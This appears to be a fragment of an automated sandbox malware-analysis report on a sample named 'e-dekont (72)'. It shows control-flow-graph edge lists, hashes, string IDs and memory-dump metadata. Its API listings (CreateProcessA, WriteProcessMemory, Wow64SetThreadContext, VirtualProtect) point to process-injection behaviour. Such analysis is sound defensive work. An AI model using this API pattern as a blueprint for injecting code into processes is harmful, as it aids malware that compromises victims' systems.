6c39ee6-6c39ef3 2023->2045 2024->1928 2033 6c39e53 2025->2033 2034 6c39e55-6c39e57 2025->2034 2037 6c39f3b 2027->2037 2038 6c39f3d-6c39f3f 2027->2038 2028->1981 2030 6c39f52-6c39f63 call 6c36e50 2028->2030 2048 6c39f65-6c39f6b 2030->2048 2049 6c39f7b-6c39f8b call 6c36e50 2030->2049 2031->2023 2032->2023 2033->2024 2034->2024 2036->1965 2037->2028 2038->2028 2039->2010 2053 6c39d84-6c39d88 2039->2053 2050 6c39eda-6c39edc 2044->2050 2051 6c39ed8 2044->2051 2045->2004 2058 6c39ef5-6c39f03 call 6c36e50 2045->2058 2054 6c39f6f-6c39f71 2048->2054 2055 6c39f6d 2048->2055 2062 6c39fa3-6c39fb0 2049->2062 2063 6c39f8d-6c39f93 2049->2063 2050->2045 2051->2045 2053->1955 2059 6c39d8e-6c39db7 2053->2059 2054->2049 2055->2049 2069 6c39f05-6c39f0b 2058->2069 2070 6c39f1b 2058->2070 2059->2010 2080 6c39db9-6c39dd7 call 6c35c80 2059->2080 2062->1981 2071 6c39fb2-6c39fc3 call 6c36e50 2062->2071 2066 6c39f97-6c39f99 2063->2066 2067 6c39f95 2063->2067 2066->2062 2067->2062 2072 6c39f0f-6c39f11 2069->2072 2073 6c39f0d 2069->2073 2070->1928 2078 6c39fc5-6c39fcb 2071->2078 2079 6c39fdb 2071->2079 2072->2070 2073->2070 2081 6c39fcf-6c39fd1 2078->2081 2082 6c39fcd 2078->2082 2079->1928 2080->2010 2081->2079 2082->2079
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Pljq$$jq
                                                                • API String ID: 0-1466860515
                                                                • Opcode ID: 580d2c331223a0a1addac818c912aa2ad775bf4beb0fb051b59d13643003e07d
                                                                • Instruction ID: 4c9330badbed8b023d832e49a53f534a13473107bd107d45680dfff6c26e2dcd
                                                                • Opcode Fuzzy Hash: 580d2c331223a0a1addac818c912aa2ad775bf4beb0fb051b59d13643003e07d
                                                                • Instruction Fuzzy Hash: 0DB13730B402158FCB54EF29C894AAA7BF6BF89710B1441A9E505CB3B5EB71DD41CBA1
                                                                Function 06AA2648 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2087 6aa2648-6aa266d 2089 6aa266f 2087->2089 2090 6aa2674-6aa2691 2087->2090 2089->2090 2091 6aa26b2 2090->2091 2092 6aa2693-6aa269c 2090->2092 2095 6aa26b5-6aa26b9 2091->2095 2093 6aa269e-6aa26a1 2092->2093 2094 6aa26a3-6aa26a6 2092->2094 2096 6aa26b0 2093->2096 2094->2096 2097 6aa28d4-6aa28eb 2095->2097 2096->2095 2099 6aa26be-6aa26c2 2097->2099 2100 6aa28f1-6aa28f5 2097->2100 2103 6aa26ca-6aa26ce 2099->2103 2104 6aa26c4-6aa2762 2099->2104 2101 6aa291f-6aa2923 2100->2101 2102 6aa28f7-6aa291c 2100->2102 2108 6aa2944 2101->2108 2109 6aa2925-6aa292e 2101->2109 2102->2101 2106 6aa26f8-6aa26fb 2103->2106 2107 6aa26d0-6aa26f5 2103->2107 2113 6aa276a-6aa276e 2104->2113 2114 6aa2764-6aa2802 2104->2114 2121 6aa2703-6aa271d 2106->2121 2107->2106 2110 6aa2947-6aa294d 2108->2110 2111 6aa2930-6aa2933 2109->2111 2112 6aa2935-6aa2938 2109->2112 2116 6aa2942 2111->2116 2112->2116 2119 6aa2798-6aa27bd 2113->2119 2120 6aa2770-6aa2795 2113->2120 2122 6aa280a-6aa280e 2114->2122 2123 6aa2804-6aa289f 2114->2123 2116->2110 2147 6aa27de 2119->2147 2148 6aa27bf-6aa27c8 2119->2148 2120->2119 2135 6aa273e 2121->2135 2136 6aa271f-6aa2728 2121->2136 2126 6aa2838-6aa285d 2122->2126 2127 6aa2810-6aa2835 2122->2127 2133 6aa28c9-6aa28cc 2123->2133 2134 6aa28a1-6aa28c6 2123->2134 2161 6aa287e 2126->2161 2162 6aa285f-6aa2868 2126->2162 2127->2126 2133->2097 2134->2133 2137 6aa2741-6aa2748 2135->2137 2143 6aa272a-6aa272d 2136->2143 2144 6aa272f-6aa2732 2136->2144 2145 6aa274a-6aa2750 2137->2145 2146 6aa2758-6aa2759 2137->2146 2150 6aa273c 2143->2150 2144->2150 2145->2146 2146->2097 2155 6aa27e1-6aa27e8 2147->2155 2153 6aa27ca-6aa27cd 2148->2153 2154 6aa27cf-6aa27d2 2148->2154 2150->2137 2157 6aa27dc 2153->2157 2154->2157 2158 6aa27ea-6aa27f0 2155->2158 2159 6aa27f8-6aa27f9 2155->2159 2157->2155 2158->2159 2159->2097 2165 6aa2881-6aa2888 2161->2165 2163 6aa286a-6aa286d 2162->2163 2164 6aa286f-6aa2872 2162->2164 2168 6aa287c 2163->2168 2164->2168 2169 6aa288a-6aa2890 2165->2169 2170 6aa2898-6aa2899 2165->2170 2168->2165 2169->2170 2170->2097
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2051997153.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6aa0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 2b59e20cb0468459b87713b144054c2c86b3dadad1d8eb79863cd8aced351321
                                                                • Instruction ID: cfb2bda2737390438b754e163051cea018d9fa48933ec418fdd2251c925e475a
                                                                • Opcode Fuzzy Hash: 2b59e20cb0468459b87713b144054c2c86b3dadad1d8eb79863cd8aced351321
                                                                • Instruction Fuzzy Hash: D5A1C174E01209CFDB58EFA5D5586ADBBB2FF49301F14802AD912BB354CB345A56CF60
                                                                Function 06C3A0F0 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2229 6c3a0f0-6c3a128 2231 6c3a214-6c3a239 2229->2231 2232 6c3a12e-6c3a132 2229->2232 2239 6c3a240-6c3a264 2231->2239 2233 6c3a146-6c3a14a 2232->2233 2234 6c3a134-6c3a140 2232->2234 2235 6c3a150-6c3a167 2233->2235 2236 6c3a26b-6c3a290 2233->2236 2234->2233 2234->2239 2247 6c3a17b-6c3a17f 2235->2247 2248 6c3a169-6c3a175 2235->2248 2254 6c3a297-6c3a2ea 2236->2254 2239->2236 2249 6c3a181-6c3a19a 2247->2249 2250 6c3a1ab-6c3a1c4 call 6c36d88 2247->2250 2248->2247 2248->2254 2249->2250 2264 6c3a19c-6c3a19f 2249->2264 2262 6c3a1c6-6c3a1ea 2250->2262 2263 6c3a1ed-6c3a211 2250->2263 2273 6c3a322-6c3a347 2254->2273 2274 6c3a2ec-6c3a30c 2254->2274 2268 6c3a1a8 2264->2268 2268->2250 2281 6c3a34e-6c3a38e 2273->2281 2274->2281 2282 6c3a30e-6c3a31f 2274->2282
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$(nq
                                                                • API String ID: 0-2974481825
                                                                • Opcode ID: 1e40b74aae8bbd682da19078312217b037b0248adfc3fca4f16ce41b5b5775a1
                                                                • Instruction ID: b116b0f92400edf366a1d0d1a5271a5207466930438c1ccf5eb4b80d5a76aba6
                                                                • Opcode Fuzzy Hash: 1e40b74aae8bbd682da19078312217b037b0248adfc3fca4f16ce41b5b5775a1
                                                                • Instruction Fuzzy Hash: DA51FE313002158FCB559F69D894AAE3BA6FF88310F108569E806CB3A6CF35DD56CBE1
                                                                Function 06C37B50 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2171 6c37b50-6c37b62 2172 6c37c56-6c37c7b 2171->2172 2173 6c37b68-6c37b6a 2171->2173 2174 6c37c82-6c37ca6 2172->2174 2173->2174 2175 6c37b70-6c37b7c 2173->2175 2187 6c37cad-6c37cd1 2174->2187 2179 6c37b90-6c37ba0 2175->2179 2180 6c37b7e-6c37b8a 2175->2180 2186 6c37ba6-6c37bb4 2179->2186 2179->2187 2180->2179 2180->2187 2191 6c37bba-6c37bbf 2186->2191 2192 6c37cd8-6c37d5b 2186->2192 2187->2192 2225 6c37bc1 call 6c37b42 2191->2225 2226 6c37bc1 call 6c37d40 2191->2226 2227 6c37bc1 call 6c37d50 2191->2227 2228 6c37bc1 call 6c37b50 2191->2228 2214 6c37d62-6c37d70 call 6c36e50 2192->2214 2215 6c37d5d call 6c34fa8 2192->2215 2194 6c37bc7-6c37c04 2207 6c37c0c-6c37c10 2194->2207 2209 6c37c33-6c37c53 call 6c35c50 2207->2209 2210 6c37c12-6c37c2b 2207->2210 2210->2209 2221 6c37d72-6c37d78 2214->2221 2222 6c37d88-6c37d8a 2214->2222 2215->2214 2223 6c37d7a 2221->2223 2224 6c37d7c-6c37d7e 2221->2224 2223->2222 2224->2222 2225->2194 2226->2194 2227->2194 2228->2194
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$Hnq
                                                                • API String ID: 0-3116299003
                                                                • Opcode ID: f6490d14b4bc9049f67507128f95d00a5f077d753b8c387897ab04457844bef7
                                                                • Instruction ID: f40cb59166a7cc2c428c0432b40107fe944d338ad07905c0d5a80839e06808fb
                                                                • Opcode Fuzzy Hash: f6490d14b4bc9049f67507128f95d00a5f077d753b8c387897ab04457844bef7
                                                                • Instruction Fuzzy Hash: AE51AC707002148FCB99AF78D86466E7BB7BF99200B1444ADD906DB3A5CF35DC06CBA5
                                                                Function 059952F8 Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2383 59952f8-5995304 2411 599530a call 59977d8 2383->2411 2412 599530a call 5997818 2383->2412 2413 599530a call 59977cb 2383->2413 2384 5995310-599534b 2385 5995351-599535c 2384->2385 2386 59945d0-59945db 2384->2386 2385->2386 2388 599451d-599454f 2386->2388 2389 599449d-59944a4 2386->2389 2390 599456f-59945b8 2386->2390 2391 59944c1-59944c2 2386->2391 2392 59944b3-59944bf 2386->2392 2393 59947d3-599487c 2386->2393 2394 59944f5-5994505 2386->2394 2395 5994565-599456c 2386->2395 2396 59944c4-59944e6 2386->2396 2397 5994507-5994518 2386->2397 2399 5994488-5994491 2388->2399 2401 5994555-5994560 2388->2401 2389->2392 2398 59944a6-59944b1 2389->2398 2390->2386 2406 59945ba-59945c5 2390->2406 2391->2388 2392->2399 2393->2386 2410 5994882-599488d 2393->2410 2394->2399 2396->2399 2400 59944e8-59944f3 2396->2400 2397->2399 2398->2399 2403 599449a-599449b 2399->2403 2404 5994493 2399->2404 2400->2399 2401->2399 2403->2389 2403->2396 2404->2388 2404->2389 2404->2390 2404->2391 2404->2392 2404->2394 2404->2395 2404->2396 2404->2397 2406->2386 2410->2386 2411->2384 2412->2384 2413->2384
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !$)
                                                                • API String ID: 0-1972669455
                                                                • Opcode ID: 0d47025c80df2c57c48a6b9f1c856ed46ee649f910b7885561e5fe110107ec2e
                                                                • Instruction ID: d2409ceaa7af111190e69f795f9c37df87ff7cf595b79d91889d7978293c66e4
                                                                • Opcode Fuzzy Hash: 0d47025c80df2c57c48a6b9f1c856ed46ee649f910b7885561e5fe110107ec2e
                                                                • Instruction Fuzzy Hash: 4341AEB4905268CFEF65CF98D848BE9B7F5BB05305F50A4D6C409B2240D7B44ACACF26
                                                                Function 05994C47 Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2414 5994c47-5994c4b 2415 5995591-59955f5 2414->2415 2416 5994c51-5994c52 2414->2416 2423 59955fb call 59975b8 2415->2423 2424 59955fb call 59975a8 2415->2424 2416->2415 2421 5995601-5995611 2422 599561b 2421->2422 2422->2422 2423->2421 2424->2421
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$&
                                                                • API String ID: 0-3870246384
                                                                • Opcode ID: 2d0acfd51cab4b935c170a1f4ae673f77476aa3689a199eddf189728cfc9abb3
                                                                • Instruction ID: cdf5aa25112aee87f1c2feeecdd1d3f9c3a1d956832cc247c2168b1a6d6b2b70
                                                                • Opcode Fuzzy Hash: 2d0acfd51cab4b935c170a1f4ae673f77476aa3689a199eddf189728cfc9abb3
                                                                • Instruction Fuzzy Hash: A101CEB4D012288FCF69DF64D854BDDBBB2BB59304F10459A9909B7250CBB41E80CF40
                                                                Function 06AE2985 Relevance: 2.5, Strings: 2, Instructions: 22COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2425 6ae2985-6ae2b6f 2449 6ae2b72 call 6ae42d0 2425->2449 2450 6ae2b72 call 6ae42c1 2425->2450 2427 6ae2b78-6ae2b9d 2429 6ae1f8f-6ae1f97 2427->2429 2430 6ae2ba3-6ae2bab 2427->2430 2431 6ae1f99 2429->2431 2432 6ae1fa0-6ae35e4 2429->2432 2430->2429 2431->2432 2436 6ae35ea-6ae360f call 6ae11d8 2432->2436 2437 6ae3d93-6ae3ddf 2432->2437 2436->2429 2441 6ae3615-6ae361d 2436->2441 2445 6ae380b-6ae3812 2437->2445 2446 6ae3de5-6ae3dfe 2437->2446 2441->2429 2446->2429 2448 6ae3e04-6ae3e0c 2446->2448 2448->2429 2449->2427 2450->2427
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A$T
                                                                • API String ID: 0-334973614
                                                                • Opcode ID: 5620a83802d5117e14a45ac73d31a216f06c120929a38c48b4c7c9e6c059a2a9
                                                                • Instruction ID: 6607620168e024a063c4323fcd5c165b8dd283fb2f759ed7ece0cdad8cb5aeaf
                                                                • Opcode Fuzzy Hash: 5620a83802d5117e14a45ac73d31a216f06c120929a38c48b4c7c9e6c059a2a9
                                                                • Instruction Fuzzy Hash: D9F05AB4D01228CFEB90EFA4D8886EDBBB2BF09315F10916AD509A7241D7785986CF94
                                                                Function 06C3EBA0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,nq
                                                                • API String ID: 0-1069744364
                                                                • Opcode ID: b6b8594f9bc6f3da99954d3ad5f58bc72fc35ad8c0d9473f6505687b8627617b
                                                                • Instruction ID: 158daaa33e549d9a1db982f6d92d1aaffc832b4186091d4f014b1876fe21edc5
                                                                • Opcode Fuzzy Hash: b6b8594f9bc6f3da99954d3ad5f58bc72fc35ad8c0d9473f6505687b8627617b
                                                                • Instruction Fuzzy Hash: D1520BB5A002288FDB64DF69C950BDDBBF6BF88300F1545D9E509AB361DA309E81CF61
                                                                Function 06C39100 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (_jq
                                                                • API String ID: 0-2603807687
                                                                • Opcode ID: dc8b0ebffce47c59dfe850ada358df6891733ca1522d1ca6c5d2d2ce9a11208c
                                                                • Instruction ID: 6528e326504a4f9afe20426833189368abe69885e5e819e100b727604b109458
                                                                • Opcode Fuzzy Hash: dc8b0ebffce47c59dfe850ada358df6891733ca1522d1ca6c5d2d2ce9a11208c
                                                                • Instruction Fuzzy Hash: 6B229F75A00215DFDB84DFA9D494AADB7B2FF88310F148069E905EB3A5DBB1ED40CB90
                                                                Function 06C85DFB Relevance: 1.7, APIs: 1, Instructions: 210processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C85FDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 1521bad1fceb98ddff61e0c0023d4e7fdf3ca32c8b18b5ff618f911ff87e157c
                                                                • Instruction ID: 42dcd6270a3c4d87f1cc365405834f0a64238985b294689bf8d7946fc6a25157
                                                                • Opcode Fuzzy Hash: 1521bad1fceb98ddff61e0c0023d4e7fdf3ca32c8b18b5ff618f911ff87e157c
                                                                • Instruction Fuzzy Hash: 30815971D002499FDBA0EFA9C9817EEBBF2BF48314F148529E819E7254DB758981CF81
                                                                Function 06C85E00 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C85FDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: aa2b5e88ffc070190137516158c9c13d17ad1a2a81a2003315764d7274b13fde
                                                                • Instruction ID: 8f06734e825ea688f68838ac085fb1605f31777d50104ada3be146bfc7edf215
                                                                • Opcode Fuzzy Hash: aa2b5e88ffc070190137516158c9c13d17ad1a2a81a2003315764d7274b13fde
                                                                • Instruction Fuzzy Hash: 55814771D002499FDBA0DFA9C9817EEBBF2BF48314F148529E818E7254DB799981CF81
                                                                Function 06C3FA20 Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $jq
                                                                • API String ID: 0-2886413773
                                                                • Opcode ID: ea4bb48e9bdb8a39d4d470a7cde5dc545b717646eb060903aa38e3868561b01b
                                                                • Instruction ID: 914ab821b24e1bad7312e47513af723da40a35adf84f52f44f6bd73d14589d94
                                                                • Opcode Fuzzy Hash: ea4bb48e9bdb8a39d4d470a7cde5dc545b717646eb060903aa38e3868561b01b
                                                                • Instruction Fuzzy Hash: A2E1C8B0B042128FDB959F25C45467E7BE2FF9A300F14486DE962CB3A5DA38CD81C7A1
                                                                Function 06C880B8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 06C881FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                • API String ID: 1304948518-0
                                                                • Opcode ID: 1f14afccb160232b6b941e45e61bc432d47c010348a680913205e5cef9f41f37
                                                                • Instruction ID: 7fb6fb4d6fc79343d38d5ccea8b2a41f7946bb87d5a2b2ed99e7ec9204c61ca0
                                                                • Opcode Fuzzy Hash: 1f14afccb160232b6b941e45e61bc432d47c010348a680913205e5cef9f41f37
                                                                • Instruction Fuzzy Hash: 9051DC71D016188FDB60EFA9C8453EEBBF2FF48314F548529E824E7684DB789940CB80
                                                                Function 06C880BA Relevance: 1.6, APIs: 1, Instructions: 142fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 06C881FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                • API String ID: 1304948518-0
                                                                • Opcode ID: 546a63a18333fc5655961421397fe52dfe635da22d987e964ae3dbf739b484f0
                                                                • Instruction ID: 196fa89f6d9d95a1028a8ff3025366fcecc562b24aa2c9f1d0c2b19ef7e04b8c
                                                                • Opcode Fuzzy Hash: 546a63a18333fc5655961421397fe52dfe635da22d987e964ae3dbf739b484f0
                                                                • Instruction Fuzzy Hash: 2451DE71D016188FDB60EFA9C8453EEBBF2FF48314F548529E825E7684DB789941CB80
                                                                Function 06C86618 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C866B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 3c871c431e492257a9b01a8b0cff4cd20f7e250e1fab3fea036d098f4377c3d9
                                                                • Instruction ID: 96b8f37eedbcda2a01d2bae45c131c52c5c1a94ad4c58c9b9657e2917f49fa63
                                                                • Opcode Fuzzy Hash: 3c871c431e492257a9b01a8b0cff4cd20f7e250e1fab3fea036d098f4377c3d9
                                                                • Instruction Fuzzy Hash: 5D2157B1D003499FCB10DFAAC885BEEBBF5FF48310F108429E919A7250CB789954CBA4
                                                                Function 06C86620 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C866B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 5d98ef674cc62fb8edf8c96d5c49e2ba6f3738b64dd078441305f57c21fdc18b
                                                                • Instruction ID: 01e9dffb34b417fdee8af03205def254c6e6982b365c49f1ae2cc64b7396980a
                                                                • Opcode Fuzzy Hash: 5d98ef674cc62fb8edf8c96d5c49e2ba6f3738b64dd078441305f57c21fdc18b
                                                                • Instruction Fuzzy Hash: 6B2119B1D003499FCB10DFAAC985BEEBBF5FF48314F108429E919A7250C7799954CBA4
                                                                Function 06C860FB Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C8617E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 52cc5770aa946521b1d7b11bf4ba38c936e221ce2f390b369b1a723f05d18a57
                                                                • Instruction ID: 362c6a7481da47fcbba503b86f7c1c5aa0ba61eb8b308615178cc4b81266fc11
                                                                • Opcode Fuzzy Hash: 52cc5770aa946521b1d7b11bf4ba38c936e221ce2f390b369b1a723f05d18a57
                                                                • Instruction Fuzzy Hash: 592139B1D002098FDB20DFAAC4857EEBBF5EF48314F108429D459A7241CB789645CFA0
                                                                Function 06C86100 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C8617E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: b3cd177f6cbeef5a838cf41f124f8ff005328631ceaf9b9391c2391088ca02fa
                                                                • Instruction ID: 43b7ca7284d40120335ec7ef1c2d2afc73d7a733ec61c5970ca1724e48ca68fe
                                                                • Opcode Fuzzy Hash: b3cd177f6cbeef5a838cf41f124f8ff005328631ceaf9b9391c2391088ca02fa
                                                                • Instruction Fuzzy Hash: 6A2115B1D003099FDB50DFAAC9857EEBBF5EF48324F14842AD519A7241CB78A944CFA1
                                                                Function 06C86A08 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06C86A84
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: f7357c489be5c7b639b3ea712818defa8cd7243899a57a1992ee428598c71111
                                                                • Instruction ID: ba320ab9197dfbee889f5eb3e3238bd62e59b6c04e6db2d8e7ca99f83b24789c
                                                                • Opcode Fuzzy Hash: f7357c489be5c7b639b3ea712818defa8cd7243899a57a1992ee428598c71111
                                                                • Instruction Fuzzy Hash: D62118B1C002099FDB10DFAAC945BEEFBF5EF48320F108429E519A7250DB79A545CFA1
                                                                Function 06C86A10 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06C86A84
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: a6c27c6779b4987125d144d55eccbe9dac5742c5b2f5db46de3c6cd9fb184783
                                                                • Instruction ID: 1a1f5ae34973daea98d61dda7680aa591a287e9dd5c014bc3772ff0d30c939be
                                                                • Opcode Fuzzy Hash: a6c27c6779b4987125d144d55eccbe9dac5742c5b2f5db46de3c6cd9fb184783
